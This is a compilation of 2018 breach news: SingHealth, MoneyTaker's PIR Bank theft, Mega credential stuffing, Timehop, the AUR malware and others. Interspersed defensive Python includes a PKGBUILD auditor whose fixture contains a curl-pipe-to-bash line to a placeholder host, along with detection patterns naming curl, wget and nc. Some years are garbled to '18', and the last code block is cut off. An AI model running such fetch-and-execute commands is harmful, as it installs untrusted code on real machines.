Hackers have stolen the health records of 1.5 million Singaporeans including Prime Minister Lee Hsien Loong, authorities said Friday, with the leader specifically targeted in the city-state's biggest ever data breach.

Singapore's health and information ministries said a government database was broken into in a "deliberate, targeted and well-planned" strike, describing the attack as "unprecedented".

"Attackers specifically and repeatedly targeted the personal particulars and outpatient information of Prime Minister Lee Hsien Loong," health minister Gan Kim Yong told a press conference.

Forensic analysis by Singapore's Cyber Security Agency "indicates this is a deliberate, targeted, and well-planned cyber-attack and not the work of casual hackers or criminal gangs," he added.

Officials declined to comment on the identity of the hackers, citing "operational security", but said the prime minister's data has not shown up anywhere on the internet.

"I don't know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret, or at least something to embarrass me," Lee wrote on Facebook.

"My medication data is not something I would ordinarily tell people about, but there is nothing alarming in it."

Hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The compromised data includes personal information and medication dispensed to patients, but medical records and clinical notes have not been affected, the health and communications ministries said.

"Health records contain information that is valuable to governments," said Eric Hoh, Asia-Pacific president of cyber-security firm FireEye.

"Nation-states increasingly collect intelligence through cyber-espionage operations which exploit the very technology we rely upon in our daily lives."

Earlier this month, the US National Intelligence Director Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the cyber-attack. A former judge will head a committee looking into the incident.

While the city-state has some of the most advanced military weaponry in the region, the government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their basements to nation-states.

In his Facebook post about the attack, Loong warned that "those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying."

In 2017, hackers broke into a defence ministry database, stealing the information of some 850 Singapore army conscripts and ministry staff.


MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank
22.7.18 securityaffairs  Incindent

The cybersecurity firm Group-IB is handling the incident response for an attack on the Russian PIR Bank conducted by the MoneyTaker hacking group.
The MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank; the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

Crooks transferred the money to 17 accounts at major Russian banks and cashed out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB in order to respond to the incident and limit the damages.

According to the Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (a conservative estimate) from the Russian bank. PIR Bank officially confirmed the attack, but it was unable to determine the exact amount of money stolen by the attackers.

Even if the bank managed to delay the withdrawal of the stolen funds, most of them are lost.

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensic analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that MoneyTaker had used in previous attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same as those used in previous attacks.

MoneyTaker is a cybercrime gang specialized in targeted attacks on financial institutions; in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group is focused on card processing and interbank transfer systems (AWS CBR and SWIFT).


The MoneyTaker group has been active at least since spring 2016, when it stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went dark for almost 4 months and attacked only banks in Russia in September 2016.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 18, Group-IB tracked two MoneyTaker attacks in Russia.

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack: Group-IB confirmed that the attack on PIR Bank started in late May 18. Hackers gained access to the bank by compromising a router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

The MoneyTaker group uses PowerShell scripts to establish persistence in the banks’ systems and to automate some stages of its attacks. Once the crooks had compromised the bank’s main network, they gained access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions with large sums and quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the financial transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.” added Group-IB.

“This is not the first successful attack on a Russian bank with money withdrawal since early 18,” says Valeriy Baulin, Head of Digital Forensics Lab Group-IB, “We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 18) – have their own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”


SingHealth, largest healthcare group in Singapore, suffered a massive data breach
22.7.18 securityaffairs  Incindent

SingHealth, the largest healthcare group in Singapore, suffered a massive data breach that exposed 1.5 million patient records.
The breach exposed personal information of 1.5 million patients who visited the group’s clinics between May 2015 and July 18. Stolen records include patients’ names, addresses, gender, race, dates of birth, and National Registration Identity Card (NRIC) numbers.

SingHealth has 42 clinical specialties, a network of 2 Hospitals, 5 National Specialty Centres, 9 Polyclinics, and Bright Vision Community Hospital.

According to a data breach notification released by Singapore’s Ministry of Health (MOH), hackers stole personal information along with ‘information on the outpatient dispensed medicines’ of about 160,000 patients. Data belonging to Singapore’s Prime Minister Lee Hsien Loong and to other ministers has been exposed in the security breach.

“About 1.5 million patients who visited SingHealth’s specialist outpatient clinics and polyclinics from 1 May 2015 to 4 July 18 have had their non-medical personal particulars illegally accessed and copied. The data taken include name, NRIC number, address, gender, race and date of birth. Information on the outpatient dispensed medicines of about 160,000 of these patients was also exfiltrated. The records were not tampered with, i.e. no records were amended or deleted.” reads the data breach notification.

“On 4 July 18, IHiS’ database administrators detected unusual activity on one of SingHealth’s IT databases. They acted immediately to halt the activity.”


According to Singapore’s authorities, the hackers specifically and repeatedly targeted Prime Minister Lee Hsien Loong’s data.

MOH explained that the data breach is the result of a targeted attack; local media speculate that a nation-state actor was involved in the cyber attack.

“Investigations by the Cyber Security Agency of Singapore (CSA) and the Integrated Health Information System (IHiS) confirmed that this was a deliberate, targeted and well-planned cyberattack. It was not the work of casual hackers or criminal gangs.” reads the press release.

Commenting on the cyber attack in a Facebook post published today, Singapore’s Prime Minister declared that the attackers are “extremely skilled and determined” and have “huge resources” to conduct such cyber attacks repeatedly, an attacker profile that matches an APT group.

“I don’t know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret or at least something to embarrass me. If so, they would have been disappointed,” the Prime Minister wrote. “My medication data is not something I would ordinarily tell people about, but nothing is alarming in it.”

“Those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying. Government systems come under attack thousands of times a day. Our goal has to be to prevent every single one of these attacks from succeeding. If we discover a breach, we must promptly put it right, improve our systems, and inform the people affected.”

The good news for Singapore citizens is that no medical records were accessed by hackers.

All affected patients will be contacted by the healthcare institution over the next five days.


Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.18 securityaffairs Incindent

Thousands of account credentials associated with the popular file storage service Mega have been published online.
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and file names.

Patrick Wardle (@patrickwardle) tweeted at 11:01 AM on Jul 18, 18:

😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included file names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …

The presence of the file listings suggests that the threat actors who collected the credentials also accessed each account and listed its contents.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet that verified the huge trove of data belongs to the Mega service.

ZDNet contacted many users that confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.


ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already appeared in a previous data breach listed in Hunt’s service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February, said Hunt,” reads the post published by ZDNet. “Of those we contacted, five said that they had used the same password on different sites.”

Mega chairman Stephen Hall also confirmed that the file is the product of credential stuffing rather than a breach of Mega's systems.

At the time, Mega did not offer two-factor authentication, so an attacker holding a password reused from another breach could log in with nothing more than the email address and password.

Mega logs the IP address of every login, and some users confirmed having seen suspicious logins to their accounts from Eastern Europe, Russia, and South America since the file was uploaded.

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content had been uploaded years earlier, which suggests the account owner stored it rather than a third party who recently obtained the credentials.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”
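Hunt's 98 percent figure is the defender's side of credential stuffing: if a password has already appeared in a breach, a login with it is suspect whether or not the account has a second factor. The following Python is an added example, not Mega's or Have I Been Pwned's code. It implements the client side of the Pwned Passwords range API (only the first five hex characters of the password's SHA-1 leave the client, so the service never learns the password) against a constructed range response so that it runs offline, and shows how the answer combines with 2FA enrolment into a login decision. The function names, the breach counts in the constructed response and the decision policy are assumptions for illustration.

```python
import hashlib
import urllib.request


def sha1_upper(password: str) -> str:
    """Uppercase hex SHA-1, the form Pwned Passwords indexes."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_range_query(password: str):
    """k-anonymity split: the 5-char prefix is all that is sent; the 35-char suffix stays local."""
    digest = sha1_upper(password)
    return digest[:5], digest[5:]


def parse_range_response(body: str) -> dict:
    """Parse 'SUFFIX:COUNT' lines (padding entries with count 0 are harmless)."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range) -> int:
    """How many times the password appears in the breaches the range service knows about."""
    prefix, suffix = split_for_range_query(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def fetch_range_live(prefix: str) -> str:
    """Network client for https://api.pwnedpasswords.com/range/<prefix>; not used by the offline demo."""
    req = urllib.request.Request(
        "https://api.pwnedpasswords.com/range/" + prefix,
        headers={"User-Agent": "credential-stuffing-example", "Add-Padding": "true"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the API so the example runs offline: the range that
# contains "password", with an invented count, plus one unrelated suffix.
def _constructed_ranges() -> dict:
    prefix, suffix = split_for_range_query("password")
    return {prefix: suffix + ":3730471\r\n0018A45C4D1DEF81644B54AB7F969B88D65:2\r\n"}


CONSTRUCTED_RANGES = _constructed_ranges()


def fetch_range_offline(prefix: str) -> str:
    return CONSTRUCTED_RANGES.get(prefix, "")


def login_decision(password: str, mfa_enrolled: bool, fetch_range=fetch_range_offline) -> str:
    """Hypothetical policy: a breached password is only tolerable behind a second factor."""
    if pwned_count(password, fetch_range) == 0:
        return "allow"
    if mfa_enrolled:
        return "allow-and-warn"  # the second factor, not the password, is what stops stuffing
    return "force-reset"  # no 2FA and a known-breached password: the scenario described above


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(pw, pwned_count(pw, fetch_range_offline), login_decision(pw, mfa_enrolled=False))
```

Swap `fetch_range_live` in for `fetch_range_offline` to query the real service; the `Add-Padding` header asks it to mix in zero-count entries so response size does not leak which range was asked for.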


HR Services Firm ComplyRight Suffers Data Breach
20.7.18 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.

However, ComplyRight says the breach affected fewer than 10 percent of the individuals whose tax forms have been prepared on its platform.


An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.


Timehop provides additional details on the recent security breach
19.7.18 securityaffairs Incindent

Timehop has recently announced that it suffered a data breach affecting 21 million user accounts. The company has now shared additional details about the incident.
Timehop's app resurfaces the posts and photos users shared on the same day in previous years. Earlier this month, the company revealed that one or more attackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The breach also exposed the access tokens Timehop uses to read users' posts on Twitter, Facebook, and Instagram. The tokens were revoked promptly and no longer work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.


“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

Type of personal data combination    Breached records    Breached GDPR records
Name, email, phone, DOB              3.3 million         174,000
Name, email address, phone           3.4 million         181,000
Name, email address, DOB             13.6 million        2.2 million
Name, phone number, DOB              3.6 million         189,000
Name and email address               18.6 million        2.9 million
Name and phone number                3.7 million         198,000
Name and DOB                         14.8 million        2.5 million
Name total                           20.4 million        3.8 million
DOB total                            15.5 million        2.6 million
Email addresses total                18.6 million        2.9 million
Gender designation total             9.2 million         2.6 million
Phone numbers total                  4.9 million         243,000
The company broke the figures out separately for records covered by the EU's GDPR, which came into force in May.

According to the company, the attacker first accessed its systems on December 19, 2017, using a compromised employee credential for the company's cloud computing environment.

The attacker connected from an IP address in the Netherlands.

In a first phase the attacker only conducted reconnaissance; at the time the compromised environment held no personal information. In early April the company moved personal information into the compromised database, and the attacker found it on June 22.

On July 4 the attacker copied the data out and changed the database password. The alerts this triggered were not recognised as a security incident for nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in a past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


US Biggest Blood Testing Laboratories LabCorp suffered a security breach
19.7.18 securityaffairs Incindent

Hackers have breached the network at LabCorp, one of the largest diagnostic blood testing laboratories in the US, potentially putting the data of millions of Americans at risk.
The company announced the incident on Monday; the breach occurred over the weekend.

The hackers breached into the LabCorp Diagnostic systems, but the company says there’s no indication that attackers compromised also the systems used by its drug development business Covance.

“At this time, there is no evidence of unauthorized transfer or misuse of data. LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation,” it said, in its statement.

LabCorp did not share further details about the security breach, in response to the incident the company shut down part of its infrastructure.

“LabCorp immediately took certain systems offline as part of its comprehensive response to contain the activity,” the firm said in an 8-K filed with the Securities and Exchange Commission.

“This temporarily affected test processing and customer access to test results over the weekend. Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed today, and we anticipate that additional systems and functions will be restored through the next several days,”


Testing operations have substantially resumed; other functions will be restored over the next few days, and some customers may see brief delays in the meantime.

“We anticipate that additional systems and functions will be restored throughout the next several days,” it added. “Some customers of LabCorp Diagnostics may experience brief delays in receiving results as we complete that process.”

The breach could have consequences for millions of Americans given the reach of LabCorp's network, which connects thousands of hospitals and testing facility offices.


Britain to Fine Facebook Over Data Breach
18.7.18 securityweek  Incindent Social

Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.

In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.

Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.

"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.

Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."

Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".

The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.

Because of the timing of the breaches, the ICO said it was unable to impose the higher penalties since introduced by the EU's General Data Protection Regulation (GDPR), which allows fines of up to 4 percent of a company's global turnover.

In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).

"In the new regime, they would face a much higher fine," Denham said.

- 'Doing the right thing' -

"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.

"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."

In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.

EU Justice Commissioner Vera Jourova welcomed the ICO report.

"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.

"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.

"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."

- Hefty compensation bill -

The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.

But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.

The next phase of the ICO's work is expected to be concluded by the end of October.

Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."

The British fine comes as Facebook faces a potential hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breach -- thought to affect some 300,000 users in Australia.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.


Timehop Shares More Details on Data Breach
18.7.18 securityweek  Incindent

Timehop has shared additional details about the recent data breach that impacted roughly 21 million user accounts, including what the attackers did once they gained access to the company’s systems and what other type of information was compromised.

Timehop provides an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites.

Earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users, which could have been leveraged to access a user’s posts on social networking websites.

In response to the incident, Timehop invalidated social media tokens to prevent abuse and instructed users to re-authenticate each service.

In an update posted on Wednesday, Timehop revealed that dates of birth, genders, and country codes were also compromised in the incident.

The investigation is ongoing, but so far the company believes the attacker gained access to 20.4 million names, 15.5 million dates of birth, 18.6 million email addresses, 9.2 million gender designations, and 4.9 million phone numbers. Timehop listed separately the number of impacted PII records covered by the recently introduced GDPR.

According to Timehop, the attacker first accessed its systems on December 19, 2017, after stealing an employee’s credentials for the company’s cloud computing environment. The unauthorized access came from an IP address in the Netherlands.

The hacker immediately started conducting reconnaissance, including scraping the list of roles and accounts, but the compromised environment had not stored any personal information.

Personal information was copied by Timehop to the compromised database in early April and the attacker only discovered it on June 22. On July 4, the hacker made a copy of the user database and then changed its password. These actions led to service disruptions and internal alerts being triggered, but it took nearly 24 hours for Timehop to determine that it had been breached after the first alert.

“[Timehop engineers] did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” Timehop said. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in a past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”


Arch Linux AUR Repository Compromised
12.7.18 securityweek  Incindent

A user-maintained Arch Linux AUR (Arch User Repository) software repository was pulled earlier this week after it was found to contain malware.

The package was taken over by an actor using the handle “xeactor” after its original maintainer orphaned it. The affected package was acroread, a user-maintained PKGBUILD for Adobe's PDF viewer.

On July 7, xeactor modified the orphaned package, adding a curl command that fetched and executed a script from an attacker-controlled server. That script installed a systemd service and timer so that a second script would be re-run periodically.

The executed scripts also gathered data on the compromised machine, including the machine ID, CPU details, Pacman package information, and the output of uname -a and systemctl list-units.

The modification was reported on July 8 and the commits were reverted within hours by maintainer Eli Schwartz, who also suspended the offending account and removed two other packages. The affected packages were acroread 9.5.5-8, balz 1.20-3, and minergate 8.1-2.

Some of those who analyzed the modified code suggested the changes might have been intended as a warning, because the script created files in a way that generated a lot of noise: a compromised.txt file was written to the root directory and to every home folder.

However, the scripts could have been modified at any time to execute arbitrary code, thus turning malicious.

As Arch's Giancarlo Razzolini points out, the issue itself isn't that severe, despite the attention it has gathered. Everyone who installs from the AUR does so at their own risk, and he suggests such incidents could easily happen more often.

“I'm surprised that this type of silly package takeover and malware introduction doesn't happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don't pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself,” Razzolini notes.

Late last month, the developers of the Gentoo Linux distribution informed users that one of their GitHub accounts was compromised and that attackers planted malicious code. Gentoo’s infrastructure and repository mirrors weren’t affected.
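The inspection step Razzolini recommends can be partly automated before `makepkg` is ever run. The following Python is an added example, not Arch's tooling: it scans a PKGBUILD for the pattern described above (a download piped straight into a shell inside a build or package function), for any other network client invoked inside a function rather than through the `source` array that makepkg verifies, and for checksums set to SKIP. Both PKGBUILD texts are constructed to illustrate the pattern; they are not the real acroread commits and the URLs are placeholders.

```python
import re

# Constructed PKGBUILD texts modelled on the pattern described above; they are
# not the real acroread commits and the source URLs are placeholders.
SUSPICIOUS_PKGBUILD = """\
pkgname=acroread
pkgver=9.5.5
pkgrel=8
source=("http://example.invalid/acroread-9.5.5.tar.bz2")
sha256sums=('SKIP')

package() {
  curl -s https://example.invalid/x | bash -
  install -Dm755 "$srcdir/acroread" "$pkgdir/usr/bin/acroread"
}
"""

CLEAN_PKGBUILD = """\
pkgname=acroread
pkgver=9.5.5
pkgrel=7
source=("http://example.invalid/acroread-9.5.5.tar.bz2")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

package() {
  install -Dm755 "$srcdir/acroread" "$pkgdir/usr/bin/acroread"
}
"""

# A download piped straight into a shell: the shape of the acroread payload.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da|z)?sh\b")
# Any network client inside a function body; sources belong in source=() so makepkg can verify them.
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|git\s+clone)\b")
# Checksums set to SKIP: nothing pins the downloaded source to what the maintainer reviewed.
SKIP_SUM = re.compile(r"^\s*(md5|sha1|sha224|sha256|sha384|sha512|b2)sums(_\w+)?=.*\bSKIP\b", re.MULTILINE)
FUNC_START = re.compile(r"^\s*(\w+)\s*\(\)\s*\{")
FUNC_END = re.compile(r"^\}")


def audit_pkgbuild(text: str):
    """Return (line_no, rule, line) findings sorted by line; an empty list means nothing matched."""
    findings = []
    in_func = None
    for n, line in enumerate(text.splitlines(), 1):
        m = FUNC_START.match(line)
        if m:
            in_func = m.group(1)
            continue
        if in_func and FUNC_END.match(line):
            in_func = None
            continue
        if FETCH_EXEC.search(line):
            findings.append((n, "fetch-and-execute", line.strip()))
        elif in_func and NET_TOOL.search(line):
            findings.append((n, "network-access-in-" + in_func + "()", line.strip()))
    for m in SKIP_SUM.finditer(text):
        n = text[: m.start()].count("\n") + 1
        findings.append((n, "unverified-source", m.group(0).strip()))
    return sorted(findings)


if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_PKGBUILD), ("clean", CLEAN_PKGBUILD)):
        print(name, audit_pkgbuild(text) or "no findings")
```

Run it over the PKGBUILD in a freshly cloned AUR repository, and read `git diff` against the previous commit as well: a version bump with no change to `source` or the checksums, as in the acroread case, deserves the same attention as the patterns above.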


Timehop Data Breach Hits 21 Million Users
12.7.18 securityweek  Incindent

Timehop informed users late last week that hackers gained unauthorized access to some of its systems as part of an attack that impacts roughly 21 million accounts.

New York-based Timehop has created an application that shows users the photos, videos and posts they shared on the current day in previous years on Facebook, Instagram, Twitter and other websites. The app also allows users to share these memories with their friends.


According to Timehop, the attacker accessed a database storing usernames, phone numbers, email addresses and social media access tokens. The incident affects approximately 21 million accounts; social media access tokens were exposed for all of them, while the other fields were exposed only for subsets, and roughly 4.7 million of the accounts included phone numbers.

The compromised tokens can allow a malicious actor to access some of the targeted user’s social media posts, but they do not provide access to private messages. Moreover, Timehop has highlighted that there is no evidence of any unauthorized access using these tokens.

“In general, Timehop only has access to social media posts you post yourself to your profile. However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts - again, we have no evidence that this actually happened,” Timehop said.

The compromised tokens have been invalidated so users will have to re-authenticate each service with Timehop, a process that will generate new tokens.

The breach was discovered on July 4, but an investigation conducted by the company showed that the attack started as early as December 19, 2017, when hackers obtained admin credentials for cloud computing services used by Timehop.

“This unauthorized user created a new administrative user account, and began conducting reconnaissance activities within our Cloud Computing Environment. For the next two days, and on one day in March 2018, and one day in June 2018, the unauthorized user logged in again and continued to conduct reconnaissance,” the company explained.

The malicious activity was detected on July 4 after the attacker accessed a production database and started transferring data, which triggered an alarm.

Timehop says it took just over two hours to contain the incident after it was detected. The company has launched an investigation in collaboration with law enforcement, an incident response firm, and a threat intelligence company. Timehop has published both high-level and more technical reports on the incident.

The company has also retained the services of GDPR specialists to help it address the implications of the breach in Europe.
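The timeline Timehop describes (an employee's cloud credential used without a second factor from an unfamiliar country, a new administrative account created in that session, months of dormancy punctuated by short reconnaissance logins, and finally a bulk export followed by a password change that was dismissed as maintenance) is the kind of sequence an audit-log correlator should join up rather than alert on piecemeal. The following Python is an added example, not Timehop's code or logs: the events, actor names and action names are constructed stand-ins for a generic cloud audit trail, and the thresholds and severity policy are assumptions.

```python
from datetime import datetime, timedelta

# Constructed audit trail modelled on the sequence described above. The actor
# names, action names and timestamps are hypothetical, not Timehop's real logs.
EVENTS = [
    {"ts": "2017-12-19T03:12:00Z", "actor": "eng-alice", "action": "ConsoleLogin", "mfa": False, "country": "NL"},
    {"ts": "2017-12-19T03:15:00Z", "actor": "eng-alice", "action": "CreateUser", "mfa": False, "country": "NL", "target": "svc-backup2"},
    {"ts": "2017-12-19T03:16:00Z", "actor": "eng-alice", "action": "AttachAdminPolicy", "mfa": False, "country": "NL", "target": "svc-backup2"},
    {"ts": "2017-12-20T02:40:00Z", "actor": "svc-backup2", "action": "ListRoles", "mfa": False, "country": "NL"},
    {"ts": "2018-03-11T01:05:00Z", "actor": "svc-backup2", "action": "ListUsers", "mfa": False, "country": "NL"},
    {"ts": "2018-06-22T02:30:00Z", "actor": "svc-backup2", "action": "DescribeDatabases", "mfa": False, "country": "NL"},
    {"ts": "2018-07-04T20:43:00Z", "actor": "svc-backup2", "action": "ExportSnapshot", "mfa": False, "country": "NL", "target": "users-prod"},
    {"ts": "2018-07-04T20:45:00Z", "actor": "svc-backup2", "action": "ModifyDBPassword", "mfa": False, "country": "NL", "target": "users-prod"},
    {"ts": "2018-07-05T09:00:00Z", "actor": "eng-bob", "action": "ConsoleLogin", "mfa": True, "country": "US"},
]

KNOWN_PRINCIPALS = {"eng-alice", "eng-bob"}   # accounts that existed before the window
KNOWN_COUNTRIES = {"US"}                      # where staff normally log in from
PRIVILEGE_GRANTS = {"AttachAdminPolicy"}
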